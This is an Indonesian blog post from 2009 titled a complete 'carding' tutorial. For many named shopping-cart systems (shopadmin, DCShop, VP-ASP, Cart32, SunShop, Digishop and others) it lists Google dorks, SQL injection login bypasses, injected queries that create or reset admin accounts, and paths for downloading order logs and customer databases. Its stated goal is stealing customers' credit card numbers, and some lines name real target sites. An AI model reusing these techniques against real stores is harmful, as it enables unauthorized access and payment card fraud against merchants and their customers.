Minggu, 29 November 2009

TUTORIAL CARDING LENGKAP

Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : Your a guest, please login or Register to see this link
user : 'or'1
pass : 'or'1



Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : Your a guest, please login or Register to see this link
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : Your a guest, please login or Register to see this link
Hapus moreinfo.asp dan ganti dengan : --> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb



Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : Your a guest, please login or Register to see this link
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : Your a guest, please login or Register to see this link
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : Your a guest, please login or Register to see this link
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)




Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : Your a guest, please login or Register to see this link
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : Your a guest, please login or Register to see this link
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
Your a guest, please login or Register to see this link
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)



Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : Your a guest, please login or Register to see this link
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : Your a guest, please login or Register to see this link
Untuk melihat admin config
Your a guest, please login or Register to see this link
Untuk melihat admin manager
Your a guest, please login or Register to see this link
Untuk melihat file log/CCnya
Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : Your a guest, please login or Register to see this link
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : Your a guest, please login or Register to see this link . Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
Your a guest, please login or Register to see this link
Contoh Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
Your a guest, please login or Register to see this link

Gantilah nilai dari string url terakhir dg:
: %20'a%25'--
: %20'b%25'--
: %20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke Your a guest, please login or Register to see this link
silahkan Cari sendiri data CCnya



Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : Lobby.asp


Ketik keyword google.com : allinurl: Lobby.asp
Contoh : Your a guest, please login or Register to see this link
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : Shopper.cgi


Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : Your a guest, please login or Register to see this link
Tambah dengan :...&template=order.log
Hasilnya :
Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem :Proddetail.asp


Ketik keyword google.com : allinurlroddetail.asp?prod=
Contoh : Your a guest, please login or Register to see this link
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : Your a guest, please login or Register to see this link




Contoh bugs pada bentuk toko sistem igishop


Ketik keyword google.com : inurl:"/cart.php?m="
Contoh : Your a guest, please login or Register to see this link .
Hapus tulisan cart.php?m=view
dan ganti dengan -->admin
Hasilnya Your a guest, please login or Register to see this link

Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

setelah bisa login, cari data yang diperlukan .



Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : Your a guest, please login or Register to see this link
masukin bugsnya : Your a guest, please login or Register to see this link
trus copy-paste tuch log'nya di notepad biar gampang di baca



Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya :'or"="
contoh target buat kalian :
Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem : Index cart


Ketik keyword google.com : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example Your a guest, please login or Register to see this link
Injection : selanjutnya masukin bugs di atas jadi : Your a guest, please login or Register to see this link
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces



Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : Your a guest, please login or Register to see this link
masukin bugs menjadi : Your a guest, please login or Register to see this link
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain... cari target lain ok..??



Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : Your a guest, please login or Register to see this link
masukin bugsnya Your a guest, please login or Register to see this link
download file .mdbnya trus buka pake MS- ACCESS..



Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik "OK" aja
Contoh buat kalian : Your a guest, please login or Register to see this link
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :'or''='



Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : 'or"="
Password : 'or"="
Contoh target :
Your a guest, please login or Register to see this link
Your a guest, please login or Register to see this link
Your a guest, please login or Register to see this link



Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
jadi Your a guest, please login or Register to see this link
dapat dech .mdb ===> trus klik open database JANGAN klik "convert databese" ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes....
sabar bro... masih di table customer no 36 then klik payment





==================================
::::::::::::: SUMBER :::::::::::::
|Your a guest, please login or Register to see this link and www.yahoo.com|
==================================
:::::::::: H4CK-ANG3L ::::::::::::
**********************************
* ::: Thanks For ::: *
* ==> Your a guest, please login or Register to see this link <== *
* **The-Coding-Team** *
**********************************

Tidak ada komentar:

Posting Komentar